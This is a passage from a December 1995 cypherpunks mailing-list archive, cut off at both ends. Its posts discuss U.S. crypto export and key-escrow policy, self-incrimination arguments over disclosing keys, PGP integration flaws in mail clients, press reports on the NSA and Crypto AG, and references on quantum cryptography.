(56-bit) products can compete with 179 foreign 
products (80 of which are software products) that 
employ DES. Liberalization of the export restrictions 
of software with encryption capabilities is essential 
if U.S. companies are to compete with strong, widely 
available non-escrowed products."

Viktor Hampel, Hampel Consulting

Proposed "a 'Consumer Protection Act for Digital 
Products' to support electronic commerce and to 
control the increasing abuse and lack of security on 
the national information highways." A copy can be 
obtained from Hampel Consulting, 1515 Jefferson Davis 
Highway, Crystal Square Suite 913, Arlington VA 22202-
3312.

In his remarks, Mr. Hampel said that trust is 
important between business. Business worries about 
issues as varied as what accountability is in the 
system and how much is the per minute interest on a 
billion dollar money transfer? These cause business to 
need solutions that NIST hasn't raised.

He recommended that a public key infrastructure be 
included into the Uniform Commercial Code.

Closing comments.

Mike Nelson noted that the meeting had some time for 
floor questions.

He was asked what is the timeframe for finishing the 
process. He danced, saying that promising a fixed date 
for policy decisions is bad for your career, but 
thought it would be done in a couple of months.

Someone asked about the "Personal Use" export process 
(the one that will allow you to export PGP on a laptop 
computer for personal use, and that was promised for 
"in a couple of weeks" at the September NIST meeting). 
They said that it is about to go to the Federal 
Register, and should be available within weeks.

Nelson was asked about foreign escrow agents. He said 
that "if there exists bilateral diplomatic agreements, 
then the US will allow specification of Foreign Escrow 
agents." [Of course, no such agreements exist now.]

Ed Appel of the White House said that the intent is to 
make export "as easy as 40-bit" is under the existing 
policies. The existing export policies will continue.

He also said "so far, we are only controlling export" 
and that "the government has very strong cryptography 
available to them, so they are not worried about 
export." He said they hope to control export in two 
ways, first by applying the combined purchasing power 
of the US Government to encourage the market, and by 
controlling export.

	 *********

After the meeting closed, I invited both Mike Nelson 
and Ed Appel to the next DC Cypherpunks meeting. 
Somehow I expect it when they declined.

     ********
A note on quoting within this document: I did not take a 
tape recorder to the meeting. Words in quotes were taken
from either my hardcopy of handouts, words in documents
on cited webpages, or from my noted. I tried hard to 
keep the words accurate and in context. There may be some
cases where my quotes are incorrect. If I've misquoted
anyone, it is not delibrate, and if told, I'll post
corrections.

Pat

Copyright (c) 1995, Pat Farrell.
Permission granted to electronically redistribute, provided
it is transmitted in the whole and unaltered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMMsugLCsmOInW9opAQGWSAP/QC3Xja8kE56XGximmiiIVEv3ihJI1uY5
2eWZSVUGOxATc3jbwtLS5bqmkDnSXhQaaD6Slk/zA9IGlNhzi4tMV1xsrKwj4l4d
0KefEWOTinVze+6SQFsIVizGb9WzRaTrGwCV9RY7RRbC0dYa+cb21JXvlZOxYk/Q
wGfkSY5/H0Y=
=hJvT
-----END PGP SIGNATURE-----



Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 10 Dec 95 08:45:37 PST
To: cypherpunks@toad.com
Subject: Is it possible?
Message-ID: <Pine.LNX.3.91.951210113717.31381A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Suppose I have the source of a C program that I would like to distribute 
on the Internet. This program computes some data (perhaps attempting to 
to do a partial brute force) and sends it's results to a server. The 
problem is someone might modify the source to simply contact the server saying 
"ok, my part of the brute force failed" and not even do anything. How can I be 
sure that the source has not been modified from the original distribution 
before it is compiled?

My original plan was to compute many digits of PI using the new Plouffe 
formula (allows you to compute any Hex digit of PI in linear time) but
perhaps trying to brute force things in this way isn't such a bad idea.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sun, 10 Dec 95 12:07:54 PST
To: cypherpunks@toad.com
Subject: Re: anonymous remailer
In-Reply-To: <UPMAIL03.199512100623550668@msn.com>
Message-ID: <199512102002.MAA16196@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Fred Nix <FredNix@msn.com> wrote:
> Hey...
>
>    How do I gain acess to the remailer?
>
> Thanks!
>
> Fred Nix


Since you are using Micro$oft Network, you must pay the extra 10% fee to
Bill Gates or he won't give you access to use the remailer.

Just kidding.  But seriously, if online time is so expensive that you don't
feel you can do a simple lycos.com search for "remailer", then you really
need to find a cheaper Internet service provider.

That said, point your web browser at the following:

http://www.stack.urc.tue.nl/~galactus/remailers/
http://www.cs.berkeley.edu/~raph/remailer-list.html
http://www.well.com/user/abacard/remail.html
http://electron.rutgers.edu/~gambino/anon_servers/anon.html

And learn to use Lycos. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Johnson <atlgator@mindspring.com>
Date: Sun, 10 Dec 95 09:34:03 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house? :)
Message-ID: <199512101733.MAA04061@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


On the lighter side (not to be taken seriously):

Q: What if Alice and Bob are siamese twins?

Could we imagine a constitutional test that turns on whether a majority of
organs are shared?  Could the dissent cite the fact that some of the shared
organs are not vital?

Q2:  Better yet, what if Alice and Bob were only 2 of say 6 distinct
personality manifestations exhibited by one physical person?  Again, would
we need to arrange for a consensus among at least 2 more personalities to
form a majority, thus entitling the collective to shared privacy?

The answers to these and other exciting questions on the next episode of 
"Exhaust that Thread."



At 01:27 AM 12/10/95 -0500, you wrote:
>On Fri, 8 Dec 1995, Black Unicorn wrote:
>
>> On Thu, 7 Dec 1995, Jeff Weinstein wrote:
>> 
>> > Black Unicorn wrote:
>> > > 
>> > > On Thu, 7 Dec 1995, sameer wrote:
>> > > 
>> >   How about if Bob had a contractual agreement with Alice to keep his
>> > key secret?
>> 
>> Then as a defense attorney, I would argue that Bob had an obvious 
>> expectation of privacy with Alice, and that the fact that he relayed this 
>> key to Alice only under those circumstances represents a definite 
>> expression of his intent to keep the key private, thus triggering 4th 
>> amendment protections.  My view is that this would be a very strong argument.
>
>Bob's Fourth Amendment rights are not triggered by his contract with 
>Alice.  Alice can be compelled to give up the key (by testimony or 
>production) and giving up that key does not tend to incriminate *Alice* 
>in a violation of law.  Alice can't invoke Bob's rights against 
>self-incrimination for obvious reasons:  Alice isn't Bob.
>^^^^
>EBD
>
>
>> 
>> Note that this is an academic opinion, not a legal one as I am not being 
>> paid.
>> 
>> >
>> > 	--Jeff
>> > 
>> > -- 
>> > Jeff Weinstein - Electronic Munitions Specialist
>> > Netscape Communication Corporation
>> > jsw@netscape.com - http://home.netscape.com/people/jsw
>> > Any opinions expressed above are mine.
>> 
>> ---
>> My prefered and soon to be permanent e-mail address: unicorn@schloss.li
>> "In fact, had Bancroft not existed,       potestas scientiae in usu est
>> Franklin might have had to invent him."    in nihilum nil posse reverti
>> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
>> 
>> 
>
>Not a lawyer on the Net, although I play one in real life.
>**********************************************************
>Flame away! I get treated worse in person every day!!
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Dec 95 03:30:27 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512101130.MAA12736@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  9 Dec 95 at 21:43, Jeff Hupp wrote:

> On  9 Dec 95 at 18:29, Siberia wrote:

> : Okay, here's how I understand things with PGP and Pegasus.
> : You have two  options with Pegasus depending on the set-up
> : options you choose.  You can either send upon completion of
> : your out-going email, or you can have your mail queued
> : until you press the send out-going mail button.  The actual
> : PGP process does not occur until you actually send the
> : mail.  So the answer would be: don't queue your mail.

> 	That's not really a solution in the Windows environment, if
> you have a swap file, you never know what gets written out
> to it.  The solution is run w/o a swap file or run an
> encrypted file system.  I run an encrypted file system.

Oh, PLEASE! Do you HAVE to go and mix up two completely
different issues? Aren't the nontechnical people trying to
follow these things likely to be confused enough without your
adding to that confusion? For every person who really 
understands the technical issues there are probably a thousand 
or ten thousand who are just trying to *use* the stuff without 
stepping into a deep hole.

An OS swap file is one kind of hole.  What Siberia is writing 
about is ANOTHER type of hole. If I wipe my swap file after 
each use of my machine and don't know that Pegasus is doing 
this, or think that because of what you wrote I'm no worse off, 
I've been done a serious disservice.

> 	Pegasus will indeed save your key with your message in the
> outgoing queue.  This is a problem with the design of
> pegasus, not with the design of the add on encryptor.  

How about saying something USEFUL, like yes or no to the
question of whether sending WITHOUT queueing will make any
difference? How about agreeing that if David Harris hopes to
provide a useful interface to external "encryptors" he will
have to do something about this?  How about cc'ing David?

Somebody else could as well point out that we're all full of 
crap because we don't use Amigas, and while he might have a 
point, it wouldn't be a very useful one.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMq8MUjw99YhtpnhAQHA2wIAo72mzD7yNYy2btraeMg92hkekW/ik/hR
SILC97a/gTGtZJiHV0MLcGETgZL51kFPQ3pRx+BGZl5g8JdRAQ2ZpQ==
=gOtF
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 10:57:49 PST
To: Greg Broiles <cypherpunks@toad.com
Subject: Re: GAK and self-incrimination?
Message-ID: <199512101959.NAA14976@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sun, 10 Dec 1995 02:57:36 -0800
> To:            cypherpunks@toad.com
> From:          Greg Broiles <gbroiles@darkwing.uoregon.edu>
> Subject:       Re: GAK and self-incrimination?
> Cc:            tcmay@got.net

> 
> Tim May writes:
> 
> >Consider this hypo: I send an encrypted message to a partner in crime
> >containing plans for future crimes and descriptions of past crimes. I don't
> >GAK the message. The government prosecutes me under the Anti-Terrorism and
> >Child Protection Act of 1997.
> >
> >My defense? That GAKKing the message would be tantamount to incriminating
> >myself, which the Fifth Amendment protects me against.      
> 
> The Fifth protects you against *compelled* self-incrimination - in
> particular, the right to be free from the "cruel trilemma" of
> 
>         o       conviction of a substantive crime, based on your
>                 (true) testimony
>         o       conviction of perjury, for lying when asked to incriminate
>                 yourself
>         o       contempt of court sanctions, for refusing to answer
> 
> but your hypo doesn't seem to create that forbidden situation. In
> particular, you're free to simply not send the message at all. 

I don't believe that that would be a consideration.  Wasn't there a 
court case a few years ago, in which a convicted criminal sued the 
government, charging that filling out one of those forms that you 
have to fill out when you buy a gun was a violation of his 5th 
amendment rights?  What ever happened to that case?

I also think that, besides the obvious 5th amendment problems, there 
would be a 1st amendment problem - if you "*had* to use GAK to 
communicate, that would be an impermissible restriction on your 1st 
amendment rights.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 10 Dec 95 09:44:15 PST
To: cypherpunks@toad.com
Subject: NSA rigs Crypto machines according to Balto Sun
Message-ID: <v02130504acf0c75190a9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Most of us might believe that the holes in Netscape's encryption
software were simply the result of sloppy engineering. That was
the public story. A story from today's Baltimore Sun  (Sunday
December 10, 1995) gives more reasons to be paranoid.

The Baltimore Sun has been running a long series of articles on
the National Security Agency. Some of the earlier ones have been
largely positive and filled with stories of intelligence coups.
Today's story, describes several reasons why one might believe
that the NSA was party to a plan to rig the machines of the
Swiss company, Crypto AG, so that the messages could be read by
those who knew the game. Crypto AG sells its machines to other
countries around the world who believe that the Swiss are
neutral vendors of superior technology that wouldn't have such
holes.

The clearest link, in my mind, was the minutes from a design
meeting at Crypto AG which was attended by an NSA cryptographer,
Nora Mackebee. (She is now 55, retired and living at what the
Sun calls a "Howard County horse farm.") But there are reasons
to wonder about this link. Motorola was also part of the list.

Also one employee got in a legal battle after being fired. The
details were settled a few days before company engineers were
scheduled to testify "that they believed the machines were
altered."

More anecdotal evidence was offered by someone who is listed as
a "longtime colleague" of Dr. Kjell Ove Widman, the Swedish
mathematician who "had total authority over Crypto algorithms."
The colleague said that Widman would often travel to Germany and
then return with design instructions. The impression was given
that Crypto could only use an algorithm if it was approved.

But approval is not, in my mind, proof of a secret attempt to
read messages. I believe that the NSA probably did more to
strengthen DES than weaken it during the classified design
process at IBM. But I only have the work of Biham and Shamir to
base these conclusions upon. Perhaps the machines were altered
to make them stronger for western firms using them? The Mackabee
meeting occured in 1975 during the height of the Cold War. The
Soviets were grabbing Western technology left and right.

Of course, the Sun also reports that Crypto AG "denied that
intelligence agenies had ever rigged its machines." (The words
in quote are the Sun's not Crypto AG's. )

So, is this what happened at Crypto AG? Is this what happened at
Netscape? We may never no for certain, but there is a final
warning for the folks at Netscape that is buried the Sun's
article about Crypto AG:

   "Meanwhile, though the company has hastened to reassure its
customers,  business has declined
    and employees have been laid off."



-=-=-=-=-

There are two more articles in the series. Tuesday's will report
that "Trolling for foreign secrets, NSA routinely picks up
Americans' overseas calls. And it's legal." On Friday, the
article reports, "The next war will be fought with computers.
NSA is getting ready." You will be able to buy a reprint of the
NSA stories from SunSource. $3.95. Call 410-332-6962.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 10 Dec 95 10:05:22 PST
To: khijol!netcom.com!ecarp@homeport.org
Subject: Re: More FUD from First Virtual
In-Reply-To: <199512101114.FAA26720@khijol>
Message-ID: <199512101808.NAA06132@homeport.org>
MIME-Version: 1.0
Content-Type: text


Ed Carp wrote:

| Adam Shostack <adam@homeport.org>
| > jim bell wrote:
| > 
| > [Good points about cost of transactions deleted]
| > 
| > | The answer, I think, it that there would be no problem finding people to
| > | take that risk in exchange for the return, ESPECIALLY if they have some
| > | input into the design (level of security) of the system.  They might insist
| > | on 2048-bit RSA keys, instead of 1024-bit, for example.
| > 
| > 	(I know its only an example, but...)
| > 
| > 	Key length is not what is needed for better security; more
| > solid code and better interfaces are needed.  (I might also argue for
| > hardware keys that are more difficult to steal..)
| 
| Nonsense.  The code is pretty solid, the interfaces aren't very 
| difficult.  What is needed is better human management of keys.  Why 
| brute-force, why look for weak keys, why bother calculating how much 
| safer 2047-bit keys are rather than 1024-bit keys when someone can 
| look on your HD and find your secret key, when they can open your 
| desk drawer and find your pass phrase or password, when they can 
| guess that you used your wife's maiden name as your password?
|
| Adam, I don't understand why you wrote nonsense in the first 
| paragraph, then followed it up with textbook attacks such as:

	I use PGP becuase its pretty good, but if I was going to trust
all my money to it, I'd want better code (especially in key
management.  And the Mac port needs a few man months of work. ;) I
don't know how solid the code is in the ecash client.  I do know that
Netscape & Microsoft can't seem to ship decent code.   (This is a
reflection of the way the industry has evolved; the first system to
require a bigger processor due to creeping featuritis gets the most
market share.   Quality of code seems to be unimportant.)  No flame at
Netscape here; they're doing what the market, conditioned by MS to
never expect bug free code, seems to want.

	Further, the interfaces are not decent.  Ever tried teaching
your mother to use PGP?  I have a lot of smart freinds; a lot of them,
while understanding how easy it is to read mail in transit, haven't
found a PGP front end thats easy enough to use that they will use it.
(This is not an invitation to send me your favorite GUI to PGP
(although if anyone has a web page of all/most of them, with reviews &
comments and maybe even screen shots, I'd like the URL.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 10 Dec 95 10:07:53 PST
To: Daniel Miskell <DMiskell@envirolink.org>
Subject: Re: The Elevator Problem
In-Reply-To: <9512101551.AA02550@envirolink.org>
Message-ID: <Pine.3.89.9512101225.B25354-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Dec 1995, Daniel Miskell wrote:

> I think i was misunderstood.  I was not referring to the actual use of light 
> in the communications process.  I was talking about the key generation method 
> suggested in that article.  Of course the use of light is impractical for most 
> - the need for direct fiberoptics aside, you have to be able to test a photon 
> for its polarized orientation.  In any case, i dig on.

I didn't read the Discover article, but I did see it in Applied Crypto, 
1st edition. The polarization thing was used for eavesdropper detection, 
rather than key generation (I think, and I may be quite wrong).

The paper was intended to show that you could have unconditional security
even if P=NP (I even think that was one of the paper titles), so the authors
used a one time pad (and used whatever key generation method is usually used
for OTPs, ie coin flips, real RNGs and whatnot). So nothing special or new 
with regards to key generation. (Of course they may have newer papers...Any 
hints folks?)

Incidentally, Brassard wrote a nice and very short intro to modern crypto
that's in the Springer-Verlag Lecture Notes in Computer Science series.
I think Applied Cryptology was the title. It had good coverage of his quantum
crypto scheme. It ought to be in any university library.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 10 Dec 95 11:30:31 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Free calls to Govt (fwd)
Message-ID: <Pine.ULT.3.91.951210133052.27659A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is being forwarded from the ALA Intellectual Freedom mailing list.  
Thought it might be important here :-)

- ---------- Forwarded message ----------
Date: Sun, 10 Dec 1995 09:59:48 -0500
From: Charles Willett <willett@AFN.ORG>
To: Multiple recipients of list ALAOIF <ALAOIF@UICVM.CC.UIC.EDU>
Subject: Free calls to Govt (fwd)

- ---------- Forwarded message ----------
Date: Sat, 9 Dec 1995 14:31:58 -0700
From: El Tiburon <proteios@indirect.com>
To: internet_censorship@monad.net
Subject: Free calls to Govt

1) Dail 1-800-444-1555

2) They will give you a short recorded message.

3) Follow instructions if you have a touch tone phone, public ones work
best and they have other advantages. :>

4) Enter a zip code...they ask for yours but it doesn't have to be...it can
be any in the US.

5) Make a choice of the elected politician's office you want to be connected to.

6) When the staff person answers you are set to discuss the proposed
environmental reform regulations, OR ANY OTHER ISSUE YOU WANT!

Couple of tricks...we found they limit the number of calls to 3 from each
number.  Solution:  public phones are everywhere...enjoy Exxon's
corporate attempt to influence "grassroots democracy".



M
      ______________________________________________________

Activism - Isnt it just participation?

                      Internet Users Consortium
                    7031 E. Camelback Ste 102-515
                        Scottsdale, AZ 85251

IUC URL:   http://www.indirect.com/www/molsen/
Proteios URL: http://www.indirect.com/www/proteios/



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMMsZczokqlyVGmCFAQE+8AP7BkUKpHH06aC79T8P/J+YRF1AeMC/MB0W
2mEqED/zNhNF7pp2v0mUlRLpG6jrY0NRGip3JWZhRcdTwiMaVEWYNNHE6dUeklzO
zm27/NxqKpi/e5ie+CsNwXKeket87+af8OZ8bzvIYg28pNcHAjnq5PLG62Oqsrxz
8E3QAHjAwc4=
=l1BI
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 10 Dec 95 11:00:50 PST
To: cypherpunks@toad.com
Subject: Re:  Is it possible?
Message-ID: <9512101857.AA07825@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> How can I be
>sure that the source has not been modified from the original distribution 
>before it is compiled?

Impossible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PasPossible@hudson.lm.com (JustMe)
Date: Wed, 13 Dec 95 04:39:59 PST
Subject: PGP status in russia
Message-ID: <PasPossible-1012951419480001@ppp073-sf2.sirius.com>
MIME-Version: 1.0
Content-Type: text/plain


does anybody know the legal status
of using encrypted email in russia?

i'm trying to talk nasty 
to a lady in moscow
who's using a borrowed account
and we'd like to keep the messages
somewhat private

anybody know the law there?
thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 12:33:36 PST
To: Adam Shostack <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: More FUD from First Virtual
Message-ID: <199512102134.PAA19064@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Adam Shostack <adam@homeport.org>
> Subject:       Re: More FUD from First Virtual
> To:            khijol!netcom.com!ecarp@homeport.org
> Date:          Sun, 10 Dec 1995 13:08:29 -0500 (EST)
> Cc:            cypherpunks@toad.com (Cypherpunks Mailing List)

> Ed Carp wrote:
> 
> | Adam Shostack <adam@homeport.org>
> | > jim bell wrote:
> | > 
> | > [Good points about cost of transactions deleted]
> | > 
> | > | The answer, I think, it that there would be no problem finding people to
> | > | take that risk in exchange for the return, ESPECIALLY if they have some
> | > | input into the design (level of security) of the system.  They might insist
> | > | on 2048-bit RSA keys, instead of 1024-bit, for example.
> | > 
> | > 	(I know its only an example, but...)
> | > 
> | > 	Key length is not what is needed for better security; more
> | > solid code and better interfaces are needed.  (I might also argue for
> | > hardware keys that are more difficult to steal..)
> | 
> | Nonsense.  The code is pretty solid, the interfaces aren't very 
> | difficult.  What is needed is better human management of keys.  Why 
> | brute-force, why look for weak keys, why bother calculating how much 
> | safer 2047-bit keys are rather than 1024-bit keys when someone can 
> | look on your HD and find your secret key, when they can open your 
> | desk drawer and find your pass phrase or password, when they can 
> | guess that you used your wife's maiden name as your password?
> |
> | Adam, I don't understand why you wrote nonsense in the first 
> | paragraph, then followed it up with textbook attacks such as:
> 
> 	I use PGP becuase its pretty good, but if I was going to trust
> all my money to it, I'd want better code (especially in key
> management.  And the Mac port needs a few man months of work. ;) I
> don't know how solid the code is in the ecash client.  I do know that
> Netscape & Microsoft can't seem to ship decent code.   (This is a
> reflection of the way the industry has evolved; the first system to
> require a bigger processor due to creeping featuritis gets the most
> market share.   Quality of code seems to be unimportant.)  No flame at
> Netscape here; they're doing what the market, conditioned by MS to
> never expect bug free code, seems to want.

As I understand it, the problems in the code aren't the result of the 
underlying algorithm being flawed, but a flawed implementation, 
especially in the areas of key management, RNG, and the amount of 
information revealed in the final encrypted product.  As far as 
anyone can tell (unfortunately, as BS pointed out, we don't have the 
mathematical tools to prove one way or the other that RSA or BBS or 
any of that algorithmical "stuff" is secure or not) the algorithms 
are secure.  The problem can almost always be traced back to either a 
poor implementation or poor QA/QC, something that TQM and all the 
current management buzzwords are going to do nothing to fix.

> 	Further, the interfaces are not decent.  Ever tried teaching
> your mother to use PGP?  I have a lot of smart freinds; a lot of them,
> while understanding how easy it is to read mail in transit, haven't
> found a PGP front end thats easy enough to use that they will use it.

I wasn't referring to the user interface, I was referring to the code 
interface, but I'll comment on the user interface.

For most people, crypto is *hard* to understand.  If it's easy to 
understand, you're probably making a LOT of assumptions about key 
management for your user, and some of those are almost certainly 
going to be bad ideas - that's why PGP gives you such flexibility.  
If you want to shoot yourself in the foot with PGP, Phil will 
certainly let you, but not without warning you first.  IMO, taking 
the complexity out of the key management process will almost 
certainly lead to designers and programmers making bad decisions 
about how the process should work, and that's going to lead to a 
whole host of problems, most of which will come home to roost at PZ's 
doorstep.  Yes, you and I and most people on this list know that this 
is bullshit, but you'd be amazed at what people will believe - 
witness the "ASCII virus" crap we all had to endure a few months 
back.  There were a lot of people who actually believed it.

I haven't found *any* PGP code that was well-integrated into anyone's 
mailer (including my own).  Maybe the code for Pegasus is different - 
I certainly hope so.

I, as well as many people, have got wrapper scripts around vi and 
emacs and pico that will do automatic encryption/decryption/signing 
for elm and pine, but that's not Windows.  If I could get my mother 
to use UNIX, she'd find that she can send and receive 
encrypted/signed email as easily as she can unencrypted/unsigned 
email - the back-end work has all been done for her.  The problem is, 
she'd rathet "do Windows" - the overall OS interface (if one can all 
Windows an OS) is a *lot* easier to work with and understand than 
UNIX is.  So, she's stuck with Pegasus and Eudora and such - and no 
way to do encryption and signing without having to go to a lot of 
trouble.

> (This is not an invitation to send me your favorite GUI to PGP
> (although if anyone has a web page of all/most of them, with reviews &
> comments and maybe even screen shots, I'd like the URL.)

I would, too... :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sun, 10 Dec 95 14:54:15 PST
To: ecarp@netcom.com
Subject: Re: GAK and self-incrimination?
Message-ID: <199512102233.AA10816@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp writes:
> Greg Broiles writes:
>> Tim May writes:
>> 
>> >Consider this hypo: I send an encrypted message to a partner in crime
>> >containing plans for future crimes and descriptions of past crimes. I 
>> >don't GAK the message. The government prosecutes me under the 
>> >Anti-Terrorism and Child Protection Act of 1997.
>> >
>> >My defense? That GAKKing the message would be tantamount to incriminating
>> >myself, which the Fifth Amendment protects me against.         
>
>> The Fifth protects you against *compelled* self-incrimination . . . In
>> particular, you're free to simply not send the message at all. 
>
>I don't believe that that would be a consideration.  Wasn't there a 
>court case a few years ago, in which a convicted criminal sued the 
>government, charging that filling out one of those forms that you 
>have to fill out when you buy a gun was a violation of his 5th 
>amendment rights?  What ever happened to that case?

This sounds like _Haynes v. United States_ 390 US 85 (1968); the Supreme
Court ruled that requiring registration of particular weapons (possession of
which was illegal) violated the Fifth Amendment. The difference between
_Haynes_ (and _Albertson v. Subversive Activities Control Board_ 382 US 70
(1965)) and Tim's hypo is that Tim's hypo doesn't force only guilty people
to provide information, it requires all people using crypto to do so - so
it's not targeted at "persons inherently suspect of criminal activities"
(see _Haynes_ at 96, _Anderson at 79), and it doesn't necessarily give rise
to "real and appreciable hazards of incrimination" (_Haynes_ at 97).

But it seems to me that the real bottom line is that the information which
is compelled is not incriminating, and the information which is
incriminating is not compelled. The keys to my crypto might lead to
incriminating evidence, or they might prove to be useful in a prosecution,
but they're not in themselves any sort of a signal that a crime has been or
will be committed.

I think it's a different argument - and probably even comes out the other
way - if the command to reveal a key is made to a particular individual in
circumstances where possession/knowledge of the key is likely to implicate
the holder in criminal activity. If the police find an encrypted disk which
is labelled "The Story of How I Killed Jimmy Hoffa and Where I Put His Body
and the Murder Weapon", compelling someone to reveal the key which decrypts
the file(s) on that disk seems incriminating, even if the information
produced (the string of binary digits which is the key) isn't by itself
incriminating.

Is it "self-incrimination" to require people to provide the government with
an address when they register a car, even though the police may use that
address to look for evidence if you're suspected of a crime? Is it
"self-incrimination" to require drivers involved in an auto accident to
remain at the scene and provide a name and address to cops or other drivers?
(Supreme Court says no self-incrim re hit & run statute, _California v.
Byers_, 402 US 424 (1971).) (Now, if the government required people who
weren't using GAK to provide a "Statement of Refusal to Comply with GAK", I
think it'd be a different kettle of fish entirely.) 

I'm not trying to say that I think GAK is good - I think it's awful. But I
don't think it's incompatible with the way that the Fifth amendment has been
interpreted over the past 200 years. I think it's possible to ignore those
interpretations and make up your own, but I don't think that's of much
practical utility where the dominant local gang doesn't find your theory
plausible or expedient. So much for the rule of law.

>I also think that, besides the obvious 5th amendment problems, there 
>would be a 1st amendment problem - if you "*had* to use GAK to 
>communicate, that would be an impermissible restriction on your 1st 
>amendment rights.                       

I agree with you re the First amendment.
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 10 Dec 95 11:36:12 PST
To: cypherpunks@toad.com
Subject: Qcrypto page, Brassard's book, Re: The Elevator Problem
In-Reply-To: <Pine.3.89.9512101225.B25354-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.3.89.9512101440.A22869-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Dec 1995 I mistakenly wrote:

> Incidentally, Brassard wrote a nice and very short intro to modern crypto
> that's in the Springer-Verlag Lecture Notes in Computer Science series.
> I think Applied Cryptology was the title. It had good coverage of his quantum
> crypto scheme. It ought to be in any university library.

Sorry, it's Modern Cryptology: A tutorial, 1988.
You'll find good info in <http://www.iro.umontreal.ca/labs/theorique>
(the titles are in french, but don't worry, the text in the "cryptographie
quantique" section is in english and has plenty of links to papers. Also
weird stuff like quantum teleportation. You'll also see Brassard and 
Crepeau's home pages.)

If you run into the listing for the Discover article, please pass it on,
I keep putting that one off.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 10 Dec 95 13:00:40 PST
To: frissell@panix.com
Subject: Re: More FUD from First Virtual
Message-ID: <01HYNC6OW73K8Y4X93@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell"  8-DEC-1995 16:15:52.58

At 02:52 PM 12/8/95 -0500, Jon Cooper wrote:

>   The US government can stop it.  It is irrelevant what *should* stop 
>it, but it's extremely useful to note that the US government's political 
>climate of paranoia and FUD in general will certainly not allow truly 
